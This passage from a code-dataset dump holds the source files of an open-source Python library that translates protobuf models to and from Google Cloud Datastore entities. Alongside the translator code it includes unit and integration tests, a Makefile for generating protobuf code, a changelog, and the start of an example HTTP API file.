# Dynamically import nested model from a corresponding file\n nested_model_name = field.message_type.name\n nested_model_module = get_python_module_for_field(field=field)\n nested_model_class = getattr(nested_model_module, nested_model_name)\n\n item_pb = nested_model_class()\n set_model_pb_value(item_pb, prop_name, value, is_nested=True)\n\n getattr(model_pb, prop_name).CopyFrom(item_pb)\n else:\n getattr(model_pb, prop_name).update(dict(value))\n elif isinstance(value, datetime):\n getattr(model_pb, prop_name).FromDatetime(value)\n elif value is None:\n # NULL type\n setattr(model_pb, prop_name, 0)\n elif isinstance(value, GeoPoint):\n item_pb = 
latlng_pb2.LatLng(latitude=value.latitude, longitude=value.longitude)\n getattr(model_pb, prop_name).CopyFrom(item_pb)\n elif isinstance(model_pb, struct_pb2.Struct):\n model_pb.update({prop_name: value})\n else:\n setattr(model_pb, prop_name, value)\n\n set_model_pb_value(model_pb, prop_name, value)\n\n return model_pb\n\n\ndef get_pb_attr_type(value):\n # type: (Any) -> str\n \"\"\"\n Return protobuf attribute type for the provided Python or protobuf value.\n \"\"\"\n if isinstance(value, timestamp_pb2.Timestamp):\n name = 'timestamp'\n elif isinstance(value, bool):\n name = 'boolean'\n elif isinstance(value, float):\n name = 'double'\n elif isinstance(value, six.integer_types):\n name = 'integer'\n elif isinstance(value, six.text_type):\n name = 'string'\n elif isinstance(value, six.binary_type):\n name = 'blob'\n elif isinstance(value, (dict, ScalarMapContainer, MessageMapContainer, struct_pb2.Struct,\n message.Message)):\n name = 'dict'\n elif isinstance(value, (list, RepeatedScalarContainer, RepeatedCompositeContainer)):\n name = 'array'\n elif value is None:\n name = 'null'\n else:\n raise ValueError('Unknown protobuf attr type', type(value))\n\n return name + '_value'\n\n\ndef get_entity_pb_for_value(value):\n # type: (Any) -> entity_pb2.Entity\n \"\"\"\n Return Entity protobuf object for the provided Python value.\n \"\"\"\n entity_pb = entity_pb2.Entity()\n\n attr_type = get_pb_attr_type(value)\n\n if attr_type == 'dict_value':\n if six.PY2:\n value = dict(value)\n\n for key, value in six.iteritems(value):\n value_pb = datastore.helpers._new_value_pb(entity_pb, key)\n value_pb = set_value_pb_item_value(value_pb=value_pb, value=value, is_struct=True)\n else:\n raise ValueError('Unsupported attribute type: %s' % (attr_type))\n\n return entity_pb\n\n\ndef set_value_pb_item_value(value_pb, value, is_struct=False):\n # type: (entity_pb2.Value, Any, bool) -> entity_pb2.Value\n \"\"\"\n Set a value attribute on the Value object based on the type of the provided value.\n\n NOTE: For complex nested types (e.g. dicts and structs this function uses recursion).\n\n :param is_struct: True if the provided value is part of a struct. This is important because\n numbers inside struct field types are handled differently (only double number\n types are supported).\n \"\"\"\n if isinstance(value, struct_pb2.ListValue):\n # Cast special ListValue type to a list\n value = cast(Any, value)\n value = list(value)\n\n if isinstance(value, float) and value.is_integer() and not is_struct:\n # Special case because of how Protobuf handles ints in some scenarios (e.g. 
Struct)\n # Regular Entity value supports integeres and double number types, but Struct mimics\n # JSON so it only supports \"number\" type which is always a double\n value = cast(Any, value)\n value = int(value)\n\n if isinstance(value, six.text_type):\n value_pb.string_value = value\n elif isinstance(value, bool):\n value_pb.boolean_value = value\n elif isinstance(value, int):\n value_pb.integer_value = value\n elif isinstance(value, float):\n value_pb.double_value = value\n elif isinstance(value, six.binary_type):\n value_pb.blob_value = value\n elif isinstance(value, list):\n if len(value) == 0:\n array_value = entity_pb2.ArrayValue(values=[])\n value_pb.array_value.CopyFrom(array_value)\n else:\n for value in value:\n value_pb_item = entity_pb2.Value()\n value_pb_item = set_value_pb_item_value(value_pb=value_pb_item, value=value,\n is_struct=is_struct)\n\n value_pb.array_value.values.append(value_pb_item)\n elif isinstance(value, struct_pb2.Value):\n item_value = _GetStructValue(value)\n set_value_pb_item_value(value_pb, item_value, is_struct=is_struct)\n elif hasattr(value, 'DESCRIPTOR'):\n # Custom user-defined type\n entity_pb_item = model_pb_to_entity_pb(value, exclude_falsy_values=True)\n value_pb.entity_value.CopyFrom(entity_pb_item)\n elif value is None:\n value_pb.null_value = struct_pb2.NULL_VALUE\n else:\n raise ValueError('Unsupported type for value: %s' % (value))\n\n return value_pb\n\n\ndef exclude_field_from_index(model, field_descriptor, exclude_from_index=None):\n # type: (U_model_class_or_instance, FieldDescriptor, Optional[List[str]]) -> bool\n \"\"\"\n Return True if a particular field should be excluded from index, False otherwise.\n\n :param model: Either a Protobuf model class type or actual Protobuf model class instance.\n \"\"\"\n # Determine if field should be excluded from index based on the \"exclude_from_index\"\n # function argument value\n # NOTE: This value has precedence over field level option\n if exclude_from_index:\n if field_descriptor.name in exclude_from_index:\n return True\n else:\n return False\n\n # Determine if field should be excluded from index based on the custom\n # \"exclude_from_index\" field level option\n field_exts = field_descriptor.GetOptions().Extensions\n\n # Bail early to avoid unncessary extension processing if there are no extensions defined\n if len(field_exts) == 0: # type: ignore\n return False\n\n exclude_from_index_ext = None\n\n # If model file is part of a package, try searching for extension inside the package first\n if model.DESCRIPTOR.file.package:\n ext_name = '%s.%s' % (model.DESCRIPTOR.file.package, EXCLUDE_FROM_INDEX_EXT_NAME)\n exclude_from_index_ext = field_exts._FindExtensionByName(ext_name) # type: ignore\n\n # And if it's not found inside the package or the model is not part of a package, try to\n # search for it in a top level namespace\n if not exclude_from_index_ext:\n ext_name = EXCLUDE_FROM_INDEX_EXT_NAME\n exclude_from_index_ext = field_exts._FindExtensionByName(ext_name) # type: ignore\n\n if not exclude_from_index_ext:\n # Exclude from index extension not found\n return False\n\n try:\n exclude_from_index_ext_value = field_exts[exclude_from_index_ext]\n except KeyError:\n return False\n\n if exclude_from_index_ext_value is True:\n return True\n\n return False\n\n\ndef get_python_module_for_field(field):\n # type: (FieldDescriptor) -> ModuleType\n \"\"\"\n Return Python module for the provided Protobuf field.\n\n NOTE: This function will also import the module if it's not already available in 
sys.path.\n \"\"\"\n model_file = field.message_type.file.name\n module_name = model_file.replace('.proto', '_pb2').replace('/', '.')\n\n module = None\n\n # Check if module is already loaded\n if module_name in sys.modules:\n # Module already in sys.modules under the same import name\n module = sys.modules[module_name]\n else:\n # Check if module is in sys.modules under a different import name aka alias\n for name in sys.modules:\n if name.endswith(module_name):\n module = sys.modules[name]\n break\n\n if not module:\n # Module not in sys.modules, import it\n module = importlib.import_module(module_name)\n\n return module\n" }, { "alpha_fraction": 0.6831762790679932, "alphanum_fraction": 0.6895929574966431, "avg_line_length": 40.214874267578125, "blob_id": "8adca66a0b96e47ec3ccfc8fa816095f8a243201", "content_id": "c6b20c0727cdbad1f0d9275a31e2d83d2d077a78", "detected_licenses": [ "Python-2.0", "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4987, "license_type": "permissive", "max_line_length": 99, "num_lines": 121, "path": "/tests/unit/test_utils.py", "repo_name": "Kami/python-protobuf-cloud-datastore-entity-translator", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Copyright 2019 Tomaz Muraus\n# Copyright 2019 Extreme Networks, Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# pylint: disable=all\n\nimport sys\nimport unittest\n\nimport mock\n\nfrom protobuf_cloud_datastore_translator.translator import get_python_module_for_field\nfrom protobuf_cloud_datastore_translator.utils import get_module_and_class_for_model_name\nfrom protobuf_cloud_datastore_translator.utils import get_exclude_from_index_fields_for_model\nfrom tests.generated import example_pb2\n\n\nclass UtilsTestCase(unittest.TestCase):\n def test_get_module_and_class_for_model_name_success(self):\n model_name = 'tests.generated.example_pb2.ExampleDBModel'\n module, model_class = get_module_and_class_for_model_name(model_name)\n self.assertEqual(module, example_pb2)\n self.assertEqual(model_class, example_pb2.ExampleDBModel)\n\n def test_get_module_and_class_for_model_name_invalid_module_name(self):\n expected_msg = 'Class \"some.not.found.Foo\" not found'\n self.assertRaisesRegexp(ValueError, expected_msg, get_module_and_class_for_model_name,\n 'some.not.found.Foo')\n\n expected_msg = 'Invalid module name:'\n self.assertRaisesRegexp(ValueError, expected_msg, get_module_and_class_for_model_name,\n 'invalid')\n\n def test_get_module_and_class_for_model_name_invalid_class_name(self):\n model_name = 'tests.generated.example_pb2.Foo'\n expected_msg = 'Class \"tests.generated.example_pb2.Foo\" not found'\n self.assertRaisesRegexp(ValueError, expected_msg, get_module_and_class_for_model_name,\n model_name)\n\n def test_get_python_module_for_field(self):\n module_name = 'example_pb2'\n full_module_name = 'tests.generated.example_pb2'\n\n # Module not in sys.module yet\n field = mock.Mock()\n field.message_type.file.name = module_name\n\n 
self._remove_module_from_sys_module(module_name)\n self._remove_module_from_sys_module(full_module_name)\n\n self.assertFalse(module_name in sys.modules)\n self.assertFalse(full_module_name in sys.modules)\n\n module = get_python_module_for_field(field=field)\n\n self.assertTrue(module)\n self.assertTrue(module_name in sys.modules)\n self.assertEqual(module.__name__, module_name)\n\n # Module already in sys.modules\n self.assertTrue(module_name in sys.modules)\n\n module = get_python_module_for_field(field=field)\n self.assertTrue(module)\n self.assertTrue(module_name in sys.modules)\n self.assertEqual(module.__name__, module_name)\n\n # Module already in sys.modules under an alias\n self._remove_module_from_sys_module(module_name)\n self._remove_module_from_sys_module(full_module_name)\n\n sys.modules[full_module_name] = module\n\n self.assertFalse(module_name in sys.modules)\n self.assertTrue(full_module_name in sys.modules)\n\n module = get_python_module_for_field(field=field)\n self.assertTrue(module)\n self.assertTrue(full_module_name in sys.modules)\n self.assertEqual(module.__name__, module_name)\n\n def test_get_python_module_for_field_invalid_module_name(self):\n field = mock.Mock()\n field.message_type.file.name = 'invalid.module'\n\n expected_msg = 'No module named'\n self.assertRaisesRegexp(ImportError, expected_msg,\n get_python_module_for_field, field)\n\n def test_get_exclude_from_index_fields(self):\n from tests.generated import example_with_options_pb2\n\n model_class = example_with_options_pb2.ExampleDBModelWithOptions1\n exclude_fields = get_exclude_from_index_fields_for_model(model_class=model_class)\n\n self.assertEqual(exclude_fields, ['string_key_one', 'string_key_three', 'int32_field_two'])\n\n model_class = example_with_options_pb2.ExampleDBModelWithOptions2\n exclude_fields = get_exclude_from_index_fields_for_model(model_class=model_class)\n\n self.assertEqual(exclude_fields, ['int32_field_two'])\n\n model_class = example_with_options_pb2.ExampleDBModelWithOptions3\n exclude_fields = get_exclude_from_index_fields_for_model(model_class=model_class)\n\n self.assertEqual(exclude_fields, [])\n\n def _remove_module_from_sys_module(self, module_name):\n if module_name in sys.modules:\n del sys.modules[module_name]\n" }, { "alpha_fraction": 0.7354056239128113, "alphanum_fraction": 0.7384381890296936, "avg_line_length": 46.10714340209961, "blob_id": "90a3c9ca2748c75cdb0725cef6d8eb160af2c0c0", "content_id": "9a1c0513a0fb414490c6f96750e31f96edc31195", "detected_licenses": [ "Python-2.0", "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 1319, "license_type": "permissive", "max_line_length": 125, "num_lines": 28, "path": "/Makefile", "repo_name": "Kami/python-protobuf-cloud-datastore-entity-translator", "src_encoding": "UTF-8", "text": ".PHONY: all\nall: protobuf\n\n.PHONY: protobuf\nprotobuf: protobuf-python protobuf-go\n\n.PHONY: protobuf-python\nprotobuf-python:\n\techo \"Generating Python protobuf files...\"\n\tmkdir -p tests/generated/models\n\tmkdir -p tests/generated/compat\n\ttouch tests/generated/__init__.py\n\ttouch tests/generated/models/__init__.py\n\ttouch tests/generated/compat/__init__.py\n\tprotoc --proto_path=protobuf/ --mypy_out=tests/generated/ --python_out=tests/generated/ protobuf/*.proto\n\tprotoc --proto_path=protobuf/ --mypy_out=tests/generated/ --python_out=tests/generated/ protobuf/models/*.proto\n\tprotoc --proto_path=protobuf/ --mypy_out=tests/generated/ --python_out=tests/generated/ 
protobuf/compat/example_compat.proto\n\t# Workaround for Protobuf compiler not using relative imports which breakes things\n\tsed -i -E \"s/^from models(.*) import/from ..models\\1 import/\" tests/generated/*/*.py\n\tsed -i -E \"s/^from models(.*) import/from ..models\\1 import/\" tests/generated/*/*.pyi\n\tsed -i -E \"s/^import options(.*)/from . import options\\1/\" tests/generated/*.py\n\tsed -i -E \"s/^import options(.*)/from . import options\\1/\" tests/generated/*.pyi\n\n.PHONY: protobuf-go\nprotobuf-go:\n\techo \"Generating Go protobuf files...\"\n\tmkdir -p tests/generated/go/\n\tprotoc --proto_path=protobuf/ --go_out=tests/generated/go/ protobuf/compat/example_compat.proto\n" }, { "alpha_fraction": 0.6824575066566467, "alphanum_fraction": 0.6876352429389954, "avg_line_length": 44.403507232666016, "blob_id": "8f7cfdc23a96e53f5312251844d340913f9b2090", "content_id": "4221684004f615171ca0fce416be4be16c990d76", "detected_licenses": [ "Python-2.0", "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12940, "license_type": "permissive", "max_line_length": 100, "num_lines": 285, "path": "/tests/integration/test_translator.py", "repo_name": "Kami/python-protobuf-cloud-datastore-entity-translator", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Copyright 2019 Tomaz Muraus\n# Copyright 2019 Extreme Networks, Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n__all__ = [\n 'GoogleDatastoreTranslatorIntegrationTestCase'\n]\n\nimport sys\n\nfrom google.cloud import datastore\n\nfrom tests.generated import example_pb2\nfrom tests.mocks import EXAMPLE_DICT_POPULATED\nfrom tests.mocks import EXAMPLE_DICT_DEFAULT_VALUES\nfrom tests.mocks import EXAMPLE_PB_POPULATED\nfrom tests.mocks import EXAMPLE_PB_DEFAULT_VALUES\nfrom tests.integration.base import BaseDatastoreIntegrationTestCase\n\nfrom protobuf_cloud_datastore_translator import model_pb_to_entity_pb\nfrom protobuf_cloud_datastore_translator import entity_pb_to_model_pb\n\n__all__ = [\n 'GoogleDatastoreTranslatorIntegrationTestCase'\n]\n\n\nclass GoogleDatastoreTranslatorIntegrationTestCase(BaseDatastoreIntegrationTestCase):\n \"\"\"\n NOTE: Those tests rely on datastore emulator running (gcloud beta emulator datastore start\n --no-store-on-disk).\n \"\"\"\n\n def setUp(self):\n super(GoogleDatastoreTranslatorIntegrationTestCase, self).setUp()\n\n modules_to_remove = [\n 'tests.generated.options_pb2',\n 'tests.generated.models.options_pb2',\n 'tests.generated.example_with_options_pb2',\n 'tests.generated.models.example_with_options_pb2',\n ]\n\n for module_name in modules_to_remove:\n if module_name in sys.modules:\n del sys.modules[module_name]\n\n def test_store_and_retrieve_populated_translated_object_from_datastore(self):\n # type: () -> None\n \"\"\"\n Test case which stores raw entity object in the datastore and verifies it matched the\n same object which is stored using translated Protobuf definition.\n \"\"\"\n key_native = self.client.key('ExampleModel', 
'native_entity_populated')\n\n entity_native = datastore.Entity(key=key_native)\n entity_native.update(EXAMPLE_DICT_POPULATED)\n self.client.put(entity_native)\n\n entity_native_retrieved = self.client.get(key_native)\n self.assertTrue(entity_native_retrieved)\n\n # Verify retrieved data matches the original input\n self.assertEqual(entity_native_retrieved, EXAMPLE_DICT_POPULATED)\n\n # Store custom Protobuf object in a datastore by translating it to Entity object\n key_translated = self.client.key('ExampleModel', 'translated_entity_populated')\n example_pb = EXAMPLE_PB_POPULATED\n entity_pb_translated = model_pb_to_entity_pb(model_pb=example_pb)\n\n # pylint: disable=no-member\n entity_pb_translated.key.CopyFrom(key_translated.to_protobuf())\n entity_translated = datastore.helpers.entity_from_protobuf(entity_pb_translated)\n self.client.put(entity_translated)\n\n # Verify that the translated entity results in the same end result as using native\n # entity object\n entity_translated_retrieved = self.client.get(key_translated)\n\n self.assertTrue(entity_translated_retrieved.key != entity_native_retrieved.key)\n\n # NOTE: key won't be the same so we clear it\n entity_translated_retrieved.key = None\n entity_native_retrieved.key = None\n\n self.assertEqual(entity_translated_retrieved, entity_native_retrieved)\n\n # If we translate retrieved entity back to the original Protobuf object definition, it\n # should be the same as the original model (minus the key since the original model doesn't\n # contain a key)\n entity_pb_retrieved = datastore.helpers.entity_to_protobuf(entity_translated_retrieved)\n entity_pb_translated.ClearField('key')\n self.assertEqual(entity_pb_translated, entity_pb_retrieved)\n\n example_pb_retrieved = entity_pb_to_model_pb(example_pb2.ExampleDBModel,\n entity_pb_retrieved)\n self.assertEqual(example_pb_retrieved, example_pb)\n\n def test_store_and_retrieve_default_values_and_translated_object_from_datastore(self):\n # type: () -> None\n key_native = self.client.key('ExampleModel', 'native_entity_default_values')\n\n entity_native = datastore.Entity(key=key_native)\n entity_native.update(EXAMPLE_DICT_DEFAULT_VALUES)\n self.client.put(entity_native)\n\n entity_native_retrieved = self.client.get(key_native)\n self.assertTrue(entity_native_retrieved)\n\n # Verify retrieved data matches the original input\n self.assertEqual(entity_native_retrieved, EXAMPLE_DICT_DEFAULT_VALUES)\n\n # Store custom Protobuf object in a datastore by translating it to Entity object\n key_translated = self.client.key('ExampleModel', 'translated_entity_default_values')\n example_pb = EXAMPLE_PB_DEFAULT_VALUES\n entity_pb_translated = model_pb_to_entity_pb(model_pb=example_pb)\n # pylint: disable=no-member\n entity_pb_translated.key.CopyFrom(key_translated.to_protobuf())\n entity_translated = datastore.helpers.entity_from_protobuf(entity_pb_translated)\n self.client.put(entity_translated)\n\n # Verify that the translated entity results in the same end result as using native\n # entity object\n entity_translated_retrieved = self.client.get(key_translated)\n\n self.assertTrue(entity_translated_retrieved.key != entity_native_retrieved.key)\n\n # NOTE: key won't be the same so we clear it\n entity_translated_retrieved.key = None\n entity_native_retrieved.key = None\n\n self.assertEqual(entity_translated_retrieved, entity_native_retrieved)\n\n # If we translate retrieved entity back to the original Protobuf object definition, it\n # should be the same as the original model (minus the key since the 
original model doesn't\n # contain a key)\n entity_pb_retrieved = datastore.helpers.entity_to_protobuf(entity_translated_retrieved)\n entity_pb_translated.ClearField('key')\n self.assertEqual(entity_pb_translated, entity_pb_retrieved)\n\n example_pb_retrieved = entity_pb_to_model_pb(example_pb2.ExampleDBModel,\n entity_pb_retrieved)\n self.assertEqual(example_pb_retrieved, example_pb)\n\n # Storing and retrieving empty object should have the same end result\n key_native_empty = self.client.key('ExampleModel', 'native_entity_empty')\n\n entity_native_empty = datastore.Entity(key=key_native_empty)\n entity_native_empty.update({})\n self.client.put(entity_native_empty)\n\n entity_native_empty_retrieved = self.client.get(key_native_empty)\n self.assertTrue(entity_native_empty_retrieved is not None)\n\n # Verify retrieved data matches the original input\n self.assertEqual(entity_native_empty_retrieved, {})\n\n # Store custom Protobuf object in a datastore by translating it to Entity object\n key_translated_empty = self.client.key('ExampleModel', 'translated_entity_empty')\n example_pb = example_pb2.ExampleDBModel()\n entity_pb_translated_empty = model_pb_to_entity_pb(model_pb=example_pb)\n # pylint: disable=no-member\n entity_pb_translated_empty.key.CopyFrom(key_translated_empty.to_protobuf())\n entity_translated_empty = datastore.helpers.entity_from_protobuf(entity_pb_translated_empty)\n self.client.put(entity_translated_empty)\n\n # Verify that the translated entity results in the same end result as using native\n # entity object\n entity_translated_empty_retrieved = self.client.get(key_translated_empty)\n\n self.assertTrue(entity_translated_empty_retrieved.key != entity_native_empty_retrieved.key)\n\n # NOTE: key won't be the same so we clear it\n entity_translated_empty_retrieved.key = None\n entity_native_empty_retrieved.key = None\n\n # self.assertEqual(entity_translated_empty_retrieved, entity_native_empty_retrieved)\n # return\n\n # If we translate retrieved entity back to the original Protobuf object definition, it\n # should be the same as the original model (minus the key since the original model doesn't\n # contain a key)\n entity_pb_empty_retrieved = \\\n datastore.helpers.entity_to_protobuf(entity_translated_empty_retrieved)\n entity_pb_translated_empty.ClearField('key')\n entity_pb_empty_retrieved.ClearField('key')\n\n self.assertEqual(entity_pb_translated_empty, entity_pb_empty_retrieved)\n\n example_pb_empty_retrieved = entity_pb_to_model_pb(example_pb2.ExampleDBModel,\n entity_pb_empty_retrieved)\n self.assertEqual(example_pb_empty_retrieved, example_pb)\n\n def test_model_pb_to_entity_pb_exclude_from_index_fields(self):\n # type: () -> None\n example_pb = example_pb2.ExampleDBModel()\n example_pb.int32_key = 100\n example_pb.string_key = 'string bar'\n example_pb.bytes_key = b'foobarbytes'\n example_pb.enum_key = 1 # type: ignore\n\n # No exclude from index provided\n entity_pb = model_pb_to_entity_pb(model_pb=example_pb)\n\n entity_translated = datastore.helpers.entity_from_protobuf(entity_pb)\n self.assertEqual(entity_translated.exclude_from_indexes, set([]))\n\n entity_translated.key = self.client.key('ExampleModel', 'exclude_from_indexes_1')\n self.client.put(entity_translated)\n\n entity_translated_retrieved = self.client.get(entity_translated.key)\n self.assertEqual(entity_translated, entity_translated_retrieved)\n\n # Exclude from index provided for some fields\n entity_pb = model_pb_to_entity_pb(model_pb=example_pb,\n exclude_from_index=['int32_key', 'bytes_key'])\n\n 
entity_translated = datastore.helpers.entity_from_protobuf(entity_pb)\n self.assertEqual(entity_translated.exclude_from_indexes, set(['int32_key', 'bytes_key']))\n\n entity_translated.key = self.client.key('ExampleModel', 'exclude_from_indexes_2')\n self.client.put(entity_translated)\n\n entity_translated_retrieved = self.client.get(entity_translated.key)\n self.assertEqual(entity_translated, entity_translated_retrieved)\n\n def test_model_pb_to_entity_pb_exclude_from_index_custom_extension_model_without_package(self):\n # type: () -> None\n from tests.generated import example_with_options_pb2\n\n model_pb = example_with_options_pb2.ExampleDBModelWithOptions1()\n model_pb.string_key_one = 'one'\n model_pb.string_key_two = 'two'\n model_pb.string_key_three = 'three'\n model_pb.string_key_four = 'four'\n model_pb.int32_field_one = 111\n model_pb.int32_field_two = 222\n\n entity_pb = model_pb_to_entity_pb(model_pb=model_pb)\n\n entity_translated = datastore.helpers.entity_from_protobuf(entity_pb)\n self.assertEqual(entity_translated.exclude_from_indexes,\n set(['string_key_one', 'int32_field_two', 'string_key_three']))\n\n entity_translated.key = self.client.key('ExampleModelWithOptions', 'exclude_from_index_1')\n self.client.put(entity_translated)\n\n entity_translated_retrieved = self.client.get(entity_translated.key)\n self.assertEqual(entity_translated, entity_translated_retrieved)\n\n def test_model_pb_to_entity_pb_exclude_from_index_custom_extension_model_with_package(self):\n # type: () -> None\n from tests.generated.models import example_with_options_pb2\n\n model_pb = example_with_options_pb2.ExampleDBModelWithOptions1()\n model_pb.string_key_one = 'one'\n model_pb.string_key_two = 'two'\n model_pb.string_key_three = 'three'\n model_pb.string_key_four = 'four'\n model_pb.int32_field_one = 111\n model_pb.int32_field_two = 222\n\n entity_pb = model_pb_to_entity_pb(model_pb=model_pb)\n\n entity_translated = datastore.helpers.entity_from_protobuf(entity_pb)\n self.assertEqual(entity_translated.exclude_from_indexes,\n set(['string_key_one', 'int32_field_two', 'string_key_three']))\n\n entity_translated.key = self.client.key('ExampleModelWithOptions', 'exclude_from_index_1')\n self.client.put(entity_translated)\n\n entity_translated_retrieved = self.client.get(entity_translated.key)\n self.assertEqual(entity_translated, entity_translated_retrieved)\n" }, { "alpha_fraction": 0.6556603908538818, "alphanum_fraction": 0.8066037893295288, "avg_line_length": 25.5, "blob_id": "4e9545a01919648bb03352dd9128df1008ffeee1", "content_id": "93dabf2987a1de8284d5a337b033c2e8683e1227", "detected_licenses": [ "Python-2.0", "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Go Module", "length_bytes": 212, "license_type": "permissive", "max_line_length": 91, "num_lines": 8, "path": "/tests/generated/go/go.mod", "repo_name": "Kami/python-protobuf-cloud-datastore-entity-translator", "src_encoding": "UTF-8", "text": "module github.com/Kami/python-protobuf-cloud-datastore-entity-translator/tests/generated/go\n\ngo 1.12\n\nrequire (\n\tgithub.com/golang/protobuf v1.3.2\n\tgoogle.golang.org/genproto v0.0.0-20190716160619-c506a9f90610\n)\n" }, { "alpha_fraction": 0.6965789198875427, "alphanum_fraction": 0.7397368550300598, "avg_line_length": 36.25490188598633, "blob_id": "0c7829e9202711e5dc5434df097c1f5688224761", "content_id": "ecd6a7f12f6ba45084ed900f0f6de675de5bfcbb", "detected_licenses": [ "Python-2.0", "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", 
"length_bytes": 3800, "license_type": "permissive", "max_line_length": 80, "num_lines": 102, "path": "/CHANGES.md", "repo_name": "Kami/python-protobuf-cloud-datastore-entity-translator", "src_encoding": "UTF-8", "text": "# v0.1.13 - September 25th, 2019\n\n* Fix a bug so number values are correctly handled inside Struct fields.\n\n Struct field value mimics JSON types which means that for numbers, it\n only supports JSON \"number\" type which is a double. This means we need\n to correctly handle all the numbers (integers and doubles) inside\n Structs and cast them to double type. #24\n\n# v0.1.12 - September 24th, 2019\n\n* Fix a bug with boolean values inside Struct fields not being handled and\n serialized correctly (they were serialized as integer instead of boolean\n value). #23\n\n Reported by @Sheshagiri\n\n# v0.1.11 - September 9th, 2019\n\n* Fix ``model_pb_to_entity_pb`` to correctly handle deeply nested Struct types\n with empty array values. #22\n\n# v0.1.10 - September 4th, 2019\n\n* Fix ``entity_pb_to_model_pb`` to correctly handle repeated Struct field types\n (aka array of Structs). #21 #20\n\n# v0.1.9 - August 29th, 2019\n\n- Internal code optimizations and add new\n ``utils.get_exclude_from_index_fields_for_model`` utility method. #19\n\n# v0.1.8 - August 28th, 2019\n\n- Fix ``exclude_from_index`` Protobuf field option functionality so it works\n correctly when field option extension is defined inside a Protobuf file which\n is part of a package.\n\n NOTE: In such scenario, definitions for other Protobuf datastore models need\n to be part of the same package. #18\n\n# v0.1.7 - August 27th, 2019\n\n- Add support for declaring which model fields are to be excluded from the\n index by specifying a custom ``exclude_from_index`` field option directly\n on the Protobuf message model field.\n\n For more information and example usage, please refer to the README. #17\n\n# v0.1.6 - August 21th, 2019\n\n- Fix a bug with ``model_pb_to_entity_pb`` method not correctly handling\n ``null`` values for nested ``google.protobuf.Struct`` fields. #16\n\n# v0.1.5 - August 16th, 2019\n\n- Add support for new ``exclude_from_index`` argument to the\n ``model_pb_to_entity_pb`` and ``model_pb_with_key_to_entity_pb`` method.\n With this argument, user can specify a list of model / entity fields which\n won't be indexed. #15\n\n# v0.1.4 - July 29th, 2019\n\n- Fix dynamic module import handling for referenced messages inside\n ``entity_pb_to_model_pb`` and make sure we don't try to import a\n module again if it's already imported under a different name (aka alias). #14\n- Fix ``entity_pb_to_model_pb`` so it correctly handles messages with a custom\n referenced type which contains a struct field. #14\n\n# v0.1.3 - July 28th, 2019\n\n- Update ``model_pb_to_entity_pb`` method so it always explicitly sets a\n default value on the translated Entity Protobuf object for repeated fields\n which reference another Protobuf message with enum field type. #12\n- Fix ``setup.py``, make sure installation works correctly under Python 2.7\n and Python >= 3.6. #13\n- Add cross programming language compatibility tests which verify that the\n output of Python and Go translator library is exactly the same. #13\n\n# v0.1.2 - June 16th, 2019\n\n- Update ``model_pb_to_entity_pb`` method so it also includes empty array\n values on the translated Entity Protobuf object. This way it's consistent\n with other complex types (empty maps, etc). 
#11\n\n# v0.1.1 - June 11th, 2019\n\n- Implement support for ``geo_point_value`` and ``google.type.LatLng`` field\n type.\n\n Now all the field types which are supported by Google Datastore are also\n supported by this library. #9\n\n# v0.1.0 - June 5th, 2019\n\n- Initial release which exposes the following public functions:\n\n - ``model_pb_to_entity_pb`` for translating custom Protobuf object into Entity\n Protobuf object which can be used with Google Datastore.\n\n - ``entity_pb_to_model_pb`` for translating Entity Protobuf object as returned\n by Google Datastore into a custom user-defined Protobuf object.\n" }, { "alpha_fraction": 0.8611111044883728, "alphanum_fraction": 0.8611111044883728, "avg_line_length": 11, "blob_id": "2064e430880fa0995bac23dc2d4e2b5b85084ee8", "content_id": "a097ae643989ee942298939403bf6218a3445115", "detected_licenses": [ "Python-2.0", "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 36, "license_type": "permissive", "max_line_length": 22, "num_lines": 3, "path": "/requirements.txt", "repo_name": "Kami/python-protobuf-cloud-datastore-entity-translator", "src_encoding": "UTF-8", "text": "six\nprotobuf\ngoogle-cloud-datastore\n" }, { "alpha_fraction": 0.6938053369522095, "alphanum_fraction": 0.7014749050140381, "avg_line_length": 30.98113250732422, "blob_id": "c1a15b2465b1a2ce8340c1cac954fa2dbffc7020", "content_id": "db3fccc9056bb67165bb1b87e51497f8c4a7120d", "detected_licenses": [ "Python-2.0", "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3390, "license_type": "permissive", "max_line_length": 99, "num_lines": 106, "path": "/examples/http_api.py", "repo_name": "Kami/python-protobuf-cloud-datastore-entity-translator", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Copyright 2019 Tomaz Muraus\n# Copyright 2019 Extreme Networks, Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"\nSimple HTTP server which allows users to retrieve and store arbitrary Protobuf objects inside Cloud\nDatastore.\n\nTo run it:\n\n$ PYTHONPATH=. gunicorn examples/http_api.py:app\n\"\"\"\n\nfrom typing import Tuple\nfrom typing import 